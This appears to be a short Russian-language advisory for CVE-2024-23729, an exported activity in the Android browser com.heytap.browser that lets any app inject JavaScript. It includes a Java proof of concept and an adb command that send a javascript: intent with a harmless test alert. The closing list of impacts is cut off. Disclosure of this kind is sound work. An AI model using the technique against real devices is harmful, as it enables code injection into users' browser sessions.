
CVE-2024-23729
В приложении com.heytap.browser на платформе Android обнаружена уязвимость. Уязвимость позволяет злоумышленнику выполнять произвольный код JavaScript в контексте приложения без каких-либо разрешений.
com.heytap.browserАктивность com.android.browser.RealBrowserActivity в приложении com.heytap.browser экспортирована и может быть вызвана любым сторонним приложением без запроса каких-либо разрешений. Вредоносное приложение может использовать это для выполнения произвольного кода JavaScript в контексте приложения `com.heytap.browser``.
{
super.onCreate(savedInstanceState);
String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse(javaScriptCommand));
intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");
startActivity(intent);
finish();
}
adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

Успешная эксплуатация позволяет злоумышленнику:
com.heytap.browser.